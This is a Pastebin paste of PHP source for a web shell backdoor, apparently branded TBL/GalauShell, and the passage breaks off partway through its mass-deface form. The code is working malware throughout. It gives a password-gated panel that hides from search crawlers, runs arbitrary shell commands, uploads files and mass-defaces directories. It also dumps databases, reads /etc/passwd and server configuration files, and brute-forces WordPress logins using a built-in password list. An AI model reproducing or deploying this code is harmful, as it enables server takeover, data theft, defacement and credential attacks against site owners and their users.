Guest User

Untitled

a guest
Dec 22nd, 2018
502
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 111.20 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "62623caf10268b16bb27676b5b27678f"; // default: Akbar
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <title>TBL.NET</title>
  31. <style type="text/css">
  32. html {
  33. margin: 20px auto;
  34. background: #000000;
  35. color: green;
  36. text-align: center;
  37. }
  38. header {
  39. color: red;
  40. margin: 10px auto;
  41. }
  42. input[type=password] {
  43. color: grey;
  44. background: #000000;
  45. border: 1px dotted white;
  46. margin-left: 20px;
  47. text-align: center;
  48. }
  49. input[type=text] {
  50. color: grey;
  51. background: #000000;
  52. border: 1px dotted white;
  53. margin-left: 20px;
  54. text-align: center;
  55. }
  56. </style>
  57. </head>
  58. <center>
  59. <header>
  60. <font color="blue" size="7">TBL@NET SHELL</font><font color="white" size="3">v1</font>
  61. <br />
  62. <?
  63. echo "Defacer IP: <font color=white>".$_SERVER['REMOTE_ADDR']."</font><br>";
  64.  
  65. ?>
  66. </header>
  67. <table border=1>
  68. <tr>
  69. <td><center><font color="white">Username :</font></center></td>
  70. <td><center><input type="text" name="user" value="akbar dravinky">
  71. </form></center></td>
  72. </tr>
  73. <tr>
  74. <td><center><font color="white">Password :</font></center></td>
  75. <td><center><form method="post">
  76. <input type="password" name="pass">
  77. </form>
  78. </center></td>
  79. </tr>
  80. </table>
  81. <br />
  82. <?php
  83. exit;
  84. }
  85. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  86. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  87. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  88. else
  89. login_shell();
  90. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  91. @ob_clean();
  92. $file = $_GET['file'];
  93. header('Content-Description: File Transfer');
  94. header('Content-Type: application/octet-stream');
  95. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  96. header('Expires: 0');
  97. header('Cache-Control: must-revalidate');
  98. header('Pragma: public');
  99. header('Content-Length: ' . filesize($file));
  100. readfile($file);
  101. exit;
  102. echo "Insert Your Username & Password!";
  103. }
  104. ?>
  105. <html>
  106. <head>
  107. <title>AKBAR DRAVINKY</title>
  108. <meta name='author' content='AKBAR DRAVINKY'>
  109. <meta charset="UTF-8">
  110. <style type='text/css'>
  111. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  112. html {
  113. background: #000000;
  114. color: white;
  115. font-family: 'Ubuntu';
  116. font-size: 13px;
  117. width: 100%;
  118. text-align: center;
  119. }
  120. li {
  121. display: inline;
  122. margin: 5px;
  123. padding: 5px;
  124. }
  125. table, th, td {
  126. border-collapse:collapse;
  127. font-family: Tahoma, Geneva, sans-serif;
  128. background: transparent;
  129. font-family: 'Ubuntu';
  130. font-size: 13px;
  131. }
  132. .table_home, .th_home, .td_home {
  133. border: 1px solid blue;
  134. }
  135. th {
  136. padding: 10px;
  137. }
  138. a {
  139. color: #ffffff;
  140. text-decoration: none;
  141. }
  142. a:hover {
  143. color: red;
  144. text-decoration: underline;
  145. }
  146. b {
  147. color: gold;
  148. }
  149. input[type=text], input[type=password],input[type=submit] {
  150. background: transparent;
  151. color: yellow;
  152. border: 1px solid blue;
  153. margin: 5px auto;
  154. padding-left: 5px;
  155. font-family: 'Ubuntu';
  156. font-size: 13px;
  157. }
  158. textarea {
  159. border: 1px solid blue;
  160. width: 100%;
  161. height: 400px;
  162. padding-left: 5px;
  163. margin: 10px auto;
  164. resize: none;
  165. background: transparent;
  166. color: yellow;
  167. font-family: 'Ubuntu';
  168. font-size: 13px;
  169. }
  170. select {
  171. width: 152px;
  172. background: #000000;
  173. color: lime;
  174. border: 1px solid #ffffff;
  175. margin: 5px auto;
  176. padding-left: 5px;
  177. font-family: 'Ubuntu';
  178. font-size: 13px;
  179. }
  180. option:hover {
  181. background: blue;
  182. color: #000000;
  183. }
  184. </style>
  185. -=<font color="blue" size="4">TBL SHELL</font>=-
  186. <br />
  187. <font color="red" size="5">TBL | BERDENDANG</font>
  188. <br />
  189. </head>
  190. <?php
  191. ###############################################################################
  192. // Greetz To D35TR0Y3R DRAVINKY- user_Tersakiti - And You
  193. // akbar dravinky
  194. ###############################################################################
  195. function w($dir,$perm) {
  196. if(!is_writable($dir)) {
  197. return "<font color=red>".$perm."</font>";
  198. } else {
  199. return "<font color=lime>".$perm."</font>";
  200. }
  201. }
  202. function r($dir,$perm) {
  203. if(!is_readable($dir)) {
  204. return "<font color=red>".$perm."</font>";
  205. } else {
  206. return "<font color=lime>".$perm."</font>";
  207. }
  208. }
  209. function exe($cmd) {
  210. if(function_exists('system')) {
  211. @ob_start();
  212. @system($cmd);
  213. $buff = @ob_get_contents();
  214. @ob_end_clean();
  215. return $buff;
  216. } elseif(function_exists('exec')) {
  217. @exec($cmd,$results);
  218. $buff = "";
  219. foreach($results as $result) {
  220. $buff .= $result;
  221. } return $buff;
  222. } elseif(function_exists('passthru')) {
  223. @ob_start();
  224. @passthru($cmd);
  225. $buff = @ob_get_contents();
  226. @ob_end_clean();
  227. return $buff;
  228. } elseif(function_exists('shell_exec')) {
  229. $buff = @shell_exec($cmd);
  230. return $buff;
  231. }
  232. }
  233. function perms($file){
  234. $perms = fileperms($file);
  235. if (($perms & 0xC000) == 0xC000) {
  236. // Socket
  237. $info = 's';
  238. } elseif (($perms & 0xA000) == 0xA000) {
  239. // Symbolic Link
  240. $info = 'l';
  241. } elseif (($perms & 0x8000) == 0x8000) {
  242. // Regular
  243. $info = '-';
  244. } elseif (($perms & 0x6000) == 0x6000) {
  245. // Block special
  246. $info = 'b';
  247. } elseif (($perms & 0x4000) == 0x4000) {
  248. // Directory
  249. $info = 'd';
  250. } elseif (($perms & 0x2000) == 0x2000) {
  251. // Character special
  252. $info = 'c';
  253. } elseif (($perms & 0x1000) == 0x1000) {
  254. // FIFO pipe
  255. $info = 'p';
  256. } else {
  257. // Unknown
  258. $info = 'u';
  259. }
  260. // Owner
  261. $info .= (($perms & 0x0100) ? 'r' : '-');
  262. $info .= (($perms & 0x0080) ? 'w' : '-');
  263. $info .= (($perms & 0x0040) ?
  264. (($perms & 0x0800) ? 's' : 'x' ) :
  265. (($perms & 0x0800) ? 'S' : '-'));
  266. // Group
  267. $info .= (($perms & 0x0020) ? 'r' : '-');
  268. $info .= (($perms & 0x0010) ? 'w' : '-');
  269. $info .= (($perms & 0x0008) ?
  270. (($perms & 0x0400) ? 's' : 'x' ) :
  271. (($perms & 0x0400) ? 'S' : '-'));
  272. // World
  273. $info .= (($perms & 0x0004) ? 'r' : '-');
  274. $info .= (($perms & 0x0002) ? 'w' : '-');
  275. $info .= (($perms & 0x0001) ?
  276. (($perms & 0x0200) ? 't' : 'x' ) :
  277. (($perms & 0x0200) ? 'T' : '-'));
  278. return $info;
  279. }
  280. function hdd($s) {
  281. if($s >= 1073741824)
  282. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  283. elseif($s >= 1048576)
  284. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  285. elseif($s >= 1024)
  286. return sprintf('%1.2f',$s / 1024 ) .' KB';
  287. else
  288. return $s .' B';
  289. }
  290. function ambilKata($param, $kata1, $kata2){
  291. if(strpos($param, $kata1) === FALSE) return FALSE;
  292. if(strpos($param, $kata2) === FALSE) return FALSE;
  293. $start = strpos($param, $kata1) + strlen($kata1);
  294. $end = strpos($param, $kata2, $start);
  295. $return = substr($param, $start, $end - $start);
  296. return $return;
  297. }
  298. function getsource($url) {
  299. $curl = curl_init($url);
  300. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  301. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  302. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  303. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  304. $content = curl_exec($curl);
  305. curl_close($curl);
  306. return $content;
  307. }
  308. function bing($dork) {
  309. $npage = 1;
  310. $npages = 30000;
  311. $allLinks = array();
  312. $lll = array();
  313. while($npage <= $npages) {
  314. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  315. if($x) {
  316. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  317. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  318. $npage = $npage + 10;
  319. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  320. } else break;
  321. }
  322. $URLs = array();
  323. foreach($allLinks as $url){
  324. $exp = explode("/", $url);
  325. $URLs[] = $exp[2];
  326. }
  327. $array = array_filter($URLs);
  328. $array = array_unique($array);
  329. $sss = count(array_unique($array));
  330. foreach($array as $domain) {
  331. echo $domain."\n";
  332. }
  333. }
  334. function reverse($url) {
  335. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  336. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  337. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  338. curl_setopt($ch, CURLOPT_HEADER, 0);
  339. curl_setopt($ch, CURLOPT_POST, 1);
  340. $resp = curl_exec($ch);
  341. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  342. $array = explode(",,", $resp);
  343. unset($array[0]);
  344. foreach($array as $lnk) {
  345. $lnk = "http://$lnk";
  346. $lnk = str_replace(",", "", $lnk);
  347. echo $lnk."\n";
  348. ob_flush();
  349. flush();
  350. }
  351. curl_close($ch);
  352. }
  353. if(get_magic_quotes_gpc()) {
  354. function idx_ss($array) {
  355. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  356. }
  357. $_POST = idx_ss($_POST);
  358. $_COOKIE = idx_ss($_COOKIE);
  359. }
  360.  
  361. if(isset($_GET['dir'])) {
  362. $dir = $_GET['dir'];
  363. chdir($dir);
  364. } else {
  365. $dir = getcwd();
  366. }
  367. $kernel = php_uname();
  368. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  369. $dir = str_replace("\\","/",$dir);
  370. $scdir = explode("/", $dir);
  371. $freespace = hdd(disk_free_space("/"));
  372. $total = hdd(disk_total_space("/"));
  373. $used = $total - $freespace;
  374. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  375. $ds = @ini_get("disable_functions");
  376. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  377. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  378. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  379. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  380. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  381. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  382. if(!function_exists('posix_getegid')) {
  383. $user = @get_current_user();
  384. $uid = @getmyuid();
  385. $gid = @getmygid();
  386. $group = "?";
  387. } else {
  388. $uid = @posix_getpwuid(posix_geteuid());
  389. $gid = @posix_getgrgid(posix_getegid());
  390. $user = $uid['name'];
  391. $uid = $uid['uid'];
  392. $group = $gid['name'];
  393. $gid = $gid['gid'];
  394. }
  395. echo "System: <font color=lime>".$kernel."</font><br>";
  396. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  397. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  398. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  399. echo "Safe Mode: $sm<br>";
  400. echo "Disable Functions: $show_ds<br>";
  401. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  402. echo "Current DIR: ";
  403. foreach($scdir as $c_dir => $cdir) {
  404. echo "<a href='?dir=";
  405. for($i = 0; $i <= $c_dir; $i++) {
  406. echo $scdir[$i];
  407. if($i != $c_dir) {
  408. echo "/";
  409. }
  410. }
  411. echo "'>$cdir</a>/";
  412. }
  413. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  414. echo "<hr>";
  415. echo "<center>";
  416. echo "<ul>";
  417. echo "<li>[ <a href='?'>Home</a> ]</li>";
  418. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  419. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  420. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  421. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  422. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  423. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  424. echo "<li>[ <a href='?dir=$dir&do=bypass'>Bypass</a> ]</li>";
  425. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  426. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  427. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  428. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
  429. echo "<li>[ <a href='?dir=$dir&do=network'>network</a> ]</li>";
  430. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li><br>";
  431. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  432. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  433. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  434. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  435. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  436. echo "<li>[ <a href='?dir=$dir&do=wp-bf'>WordPress Brute Force</a> ]</li>";
  437. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  438. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
  439. echo "<li>[ <a href='?dir=$dir&do=elfinder'>ElFinder Auto Exploiter</a> ]</li>";
  440. echo "<li>[ <a href='?dir=$dir&do=hash'>Hash</a> ]</li>";
  441. echo "<li>[ <a href='?dir=$dir&do=dump'>Database Dump</a> ]</li>";
  442. echo "<li>[ <a style='color: yellow;' href='?do=about'>About</a> ]</li>";
  443. echo "<li>[ <a style='color: red;' href='?logout=true'>Logout</a> ]</li>";
  444. echo "</ul>";
  445. echo "</center>";
  446. echo "<hr>";
  447. if($_GET['logout'] == true) {
  448. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  449. echo "<script>window.location='?';</script>";
  450.  
  451. } if($_GET['do'] == 'dump') {
  452. echo "<form method='post'>";
  453. echo $head."<p align='center'>";
  454. echo "<table width='371' class=tabnet>";
  455. echo "<tr><th colspan='2'>Database Dump</th></tr>";
  456. echo "<tr>";
  457. echo "<td>Server </td>";
  458. echo "<td><input class='inputz' type=text name=server size=52></td></tr><tr>";
  459. echo "<td>Username</td>
  460. <td><input class='inputz' type=text name=username size=52></td></tr><tr>";
  461. echo "<td>Password</td>
  462. <td><input class='inputz' type=text name=password size=52></td></tr><tr>";
  463. echo "<td>DataBase Name</td>";
  464. echo "<td><input class='inputz' type=text name=dbname size=52></td></tr>";
  465. echo "<tr>";
  466. echo "<td>DB Type </td>";
  467. echo "<td><form method=post action='".$me."'>";
  468. echo "<select class='inputz' name=method>";
  469. echo "<option value='gzip'>Gzip</option>";
  470. echo "<option value='ql'>Sql</option>";
  471. echo "</select>";
  472. echo "<input class='inputzbut' type=submit value=' Dump! ' ></td></tr>";
  473. echo "</form></center></table>";
  474. if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
  475. $date = date("Y-m-d");
  476. $dbserver = $_POST['server'];
  477. $dbuser = $_POST['username'];
  478. $dbpass = $_POST['password'];
  479. $dbname = $_POST['dbname'];
  480. $file = "Dump-$dbname-$date";
  481. $method = $_POST['method'];
  482. if ($method=='sql'){
  483. $file="Dump-$dbname-$date.sql";
  484. $fp=fopen($file,"w");
  485. }else{
  486. $file="Dump-$dbname-$date.sql.gz";
  487. $fp = gzopen($file,"w");
  488. }
  489. function write($data) {
  490. global $fp;
  491. if ($_POST['method']=='ssql'){
  492. fwrite($fp,$data);
  493. }else{
  494. gzwrite($fp, $data);
  495. }}
  496. mysql_connect ($dbserver, $dbuser, $dbpass);
  497. mysql_select_db($dbname);
  498. $tables = mysql_query ("SHOW TABLES");
  499. while ($i = mysql_fetch_array($tables)) {
  500. $i = $i['Tables_in_'.$dbname];
  501. $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
  502. write($create['Create Table'].";\n\n");
  503. $sql = mysql_query ("SELECT * FROM ".$i);
  504. if (mysql_num_rows($sql)) {
  505. while ($row = mysql_fetch_row($sql)) {
  506. foreach ($row as $j => $k) {
  507. $row[$j] = "'".mysql_escape_string($k)."'";
  508. }
  509. write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
  510. }
  511. }
  512. }
  513. if ($method=='ssql'){
  514. fclose ($fp);
  515. }else{
  516. gzclose($fp);}
  517. header("Content-Disposition: attachment; filename=" . $file);
  518. header("Content-Type: application/download");
  519. header("Content-Length: " . filesize($file));
  520. flush();
  521.  
  522. $fp = fopen($file, "r");
  523. while (!feof($fp))
  524. {
  525. echo fread($fp, 65536);
  526. flush();
  527. }
  528. fclose($fp);
  529. }
  530. } if($_GET['do'] == 'about') {
  531. echo "<br><br><br><font color='blue' size='7'>GalauShell</font><font color=' white' size='3'>v1</font><br> by<br> Mr.CyB3R_INk146 - 1ntr0ver7_Tersakiti
  532. <br><br>shell ini hasil recode shell backdor lainya<br>waktu tongkrongan sepi:'(<br>
  533. Dan hasil akhirnya malah tambah bikin galau, Karena malah makin kacauu. Wkwkwk :v<br><br><font color='red'>Thanks to:</font><br>All Members akbar dravinky: 5iNON!MOU23 ~ joker.01 ~ bh3not_ ~ Mr.Oz ~ Mr.Crabs ~ ./Mr.HanzID ~ Peoplehurt1337 ~ Gend3ruw0 ~ ./Mister-Y404 ~ Mr. Hurted ~ ./D14 ~ Mr.keset~ ./M~I~R[404] ~ And You";
  534. echo "<br> Recoded From <font color='lime'>TBL.NET</font></center><center>";
  535. } if($_GET['do'] == 'bypass') {
  536. echo "<form method='post'>";
  537. echo "<font color='red'> -=[ Command Bypass Exploit ]=- </font>";
  538. print_r('
  539. <pre>
  540. <form method="POST" action="">
  541. <b><font color=#00ff00><b><font color="#00ff00">Command :=) </font></font></b><input name="baba" type="text" class="inputz" size="34"><input type="submit" class="inputzbut" value="Go">
  542. </form>
  543. <form method="POST" action=""><strong><b><font color="#00ff00">Menu Bypass :=) </font></strong><select name="liz0" size="1" class="inputz">
  544. <option value="cat /etc/passwd">/etc/passwd</option>
  545. <option value="netstat -an | grep -i listen">netstat</option>
  546. <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
  547. <option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
  548. <option value="cat /etc/hosts">/etc/hosts</option>
  549. <option value="cat /etc/named.conf">/etc/named.conf</option>
  550. <option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
  551. </select> <input type="submit" class="inputzbut" value="G&ouml;">
  552. </form>
  553. </pre>
  554. ');
  555. ini_restore("safe_mode");
  556. ini_restore("open_basedir");
  557. $liz0=shell_exec($_POST[baba]);
  558. $liz0zim=shell_exec($_POST[liz0]);
  559. $uid=shell_exec('id');
  560. $server=shell_exec('uname -a');
  561. echo "<pre><h4>";
  562.  
  563. echo $liz0;
  564. echo $liz0zim;
  565. echo "</h4></pre>";
  566. "</div>";
  567.  
  568. } if($_GET['do'] == 'wp-bf') {
  569. echo "<form method='post'>";
  570. echo "<center>";
  571. echo "<font size='2' >+--=[ Wordpress Brute Force ]=--+</font><br>";
  572. echo "<form enctype='multipart/form-data' method='POST'>";
  573. echo "<table width='624' border='0' class='tabnet' id='Box'>";
  574. echo "<tr><th colspan='5'>Wordpress Brute Force</th></tr>";
  575.  
  576. echo "<tr>";
  577. echo "<td >&nbsp;</td>
  578. <td ><p>Hosts:</p></td>
  579. <td ><p> Users:</p></td>
  580. <td ><p>Passwords:</p></td>
  581. </tr>";
  582. echo "<tr>
  583. <td>&nbsp;</td>";
  584. echo "<td ><textarea style='background:black;' name='hosts'cols='30' rows='10'>";
  585. if($_POST){echo $_POST['hosts'];}
  586. echo "</textarea></td>";
  587. echo "<td ><textarea style='background:black;' name='usernames' cols='30'rows='10' >";
  588. if($_POST){echo $_POST['usernames'];}else {echo "admin";}
  589. echo "</textarea></td>";
  590. echo "<td ><textarea style='background:black;' name=''asswords''cols='30'rows='10' >";
  591. if($_POST){echo $_POST['passwords'];}else {echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";}
  592. echo "</textarea></td>
  593. </tr>";
  594. echo "<center><tr><td colspan='4'><input class='inputzbut' type='submit' name='submit' value='Brute Now' />";
  595. if($_POST)
  596. {
  597. $hosts = trim(filter($_POST['hosts']));
  598. $passwords = trim(filter($_POST['passwords']));
  599. $usernames = trim(filter($_POST['usernames']));
  600.  
  601. if($passwords && $usernames && $hosts)
  602. {
  603. $hosts_explode = explode("\n", $hosts);
  604. $usernames_explode = explode("\n", $usernames);
  605. $passwords_explode = explode("\n", $passwords);
  606.  
  607. foreach($hosts_explode as $host)
  608. {
  609. $host = RemoveLastSlash($host);
  610. $hacked = 0;
  611. $host = str_replace(array("http://","https://","www."),"",trim($host));
  612. $host = "http://".$host;
  613. $wpAdmin = $host.'/wp-admin/';
  614.  
  615. if(!url_exists($host."/wp-login.php"))
  616. {echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";ob_flush();flush();continue;}
  617.  
  618. foreach($usernames_explode as $username)
  619. {
  620. foreach($passwords_explode as $password)
  621. {
  622. $ch = curl_init();
  623. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  624. curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php');
  625. curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
  626. curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
  627. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
  628. curl_setopt($ch,CURLOPT_POST,TRUE);
  629. curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri&#8207;"."&redirect_to=".$wpAdmin."&testcookie=1");
  630. $login = curl_exec($ch);
  631.  
  632. if(eregi ("profile.php",$login) )
  633. {
  634. $hacked = 1;
  635. echo "<p>".$host." => UserName : [<font color='green'>".$username."</font>] : Password : [<font color='green'>".$password."</font>]</p>";
  636. ob_flush();flush();break;
  637. }
  638. }
  639. if($hacked == 1){break;}
  640. }
  641. if($hacked == 0)
  642. {echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();}
  643. }
  644. }
  645. else {echo "<p><font color='red'>All fields are Required ! </font></p>";}
  646. }
  647. ?>
  648. </td></tr>
  649. </table></form></center>
  650. <?php
  651. function url_exists($strURL)
  652. {
  653. $resURL = curl_init();
  654. curl_setopt($resURL, CURLOPT_URL, $strURL);
  655. curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
  656. curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
  657. curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
  658. curl_exec ($resURL);
  659. $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
  660. curl_close ($resURL);
  661. if ($intReturnCode != 200){return false;}
  662. else{return true ;}
  663. }
  664. function filter($string)
  665. {
  666. if(get_magic_quotes_gpc() != 0){return stripslashes($string); }
  667. else{return $string; }
  668. }
  669. function RemoveLastSlash($host)
  670. {
  671. if(strrpos($host, '/', -1) == strlen($host)-1)
  672. {return substr($host,0,strrpos($host, '/', -1));}
  673. else{return $host;}
  674. }
  675. echo "</p>";
  676.  
  677. }
  678. elseif($_GET['do'] == 'upload') {
  679. echo "<center>";
  680. if($_POST['upload']) {
  681. if($_POST['tipe_upload'] == 'biasa') {
  682. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  683. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  684. } else {
  685. $act = "<font color=red>failed to upload file</font>";
  686. }
  687. } else {
  688. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  689. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  690. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  691. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  692. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  693. } else {
  694. $act = "<font color=red>failed to upload file</font>";
  695. }
  696. } else {
  697. $act = "<font color=red>failed to upload file</font>";
  698. }
  699. }
  700. }
  701. echo "Upload File:
  702. <form method='post' enctype='multipart/form-data'>
  703. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  704. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  705. <input type='file' name='ix_file'>
  706. <input type='submit' value='upload' name='upload'>
  707. </form>";
  708. echo $act;
  709. echo "</center>";
  710. } elseif($_GET['do'] == 'cmd') {
  711. echo "<form method='post'>
  712. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  713. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  714. </form>";
  715. if($_POST['do_cmd']) {
  716. echo "<pre>".exe($_POST['cmd'])."</pre>";
  717. }
  718. } elseif($_GET['do'] == 'mass_deface') {
  719. function sabun_massal($dir,$namafile,$isi_script) {
  720. if(is_writable($dir)) {
  721. $dira = scandir($dir);
  722. foreach($dira as $dirb) {
  723. $dirc = "$dir/$dirb";
  724. $lokasi = $dirc.'/'.$namafile;
  725. if($dirb === '.') {
  726. file_put_contents($lokasi, $isi_script);
  727. } elseif($dirb === '..') {
  728. file_put_contents($lokasi, $isi_script);
  729. } else {
  730. if(is_dir($dirc)) {
  731. if(is_writable($dirc)) {
  732. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  733. file_put_contents($lokasi, $isi_script);
  734. $idx = sabun_massal($dirc,$namafile,$isi_script);
  735. }
  736. }
  737. }
  738. }
  739. }
  740. }
  741. function sabun_biasa($dir,$namafile,$isi_script) {
  742. if(is_writable($dir)) {
  743. $dira = scandir($dir);
  744. foreach($dira as $dirb) {
  745. $dirc = "$dir/$dirb";
  746. $lokasi = $dirc.'/'.$namafile;
  747. if($dirb === '.') {
  748. file_put_contents($lokasi, $isi_script);
  749. } elseif($dirb === '..') {
  750. file_put_contents($lokasi, $isi_script);
  751. } else {
  752. if(is_dir($dirc)) {
  753. if(is_writable($dirc)) {
  754. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  755. file_put_contents($lokasi, $isi_script);
  756. }
  757. }
  758. }
  759. }
  760. }
  761. }
  762. if($_POST['start']) {
  763. if($_POST['tipe_sabun'] == 'mahal') {
  764. echo "<div style='margin: 5px auto; padding: 5px'>";
  765. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  766. echo "</div>";
  767. } elseif($_POST['tipe_sabun'] == 'murah') {
  768. echo "<div style='margin: 5px auto; padding: 5px'>";
  769. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  770. echo "</div>";
  771. }
  772. } else {
  773. echo "<center>";
  774. echo "<form method='post'>
  775. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
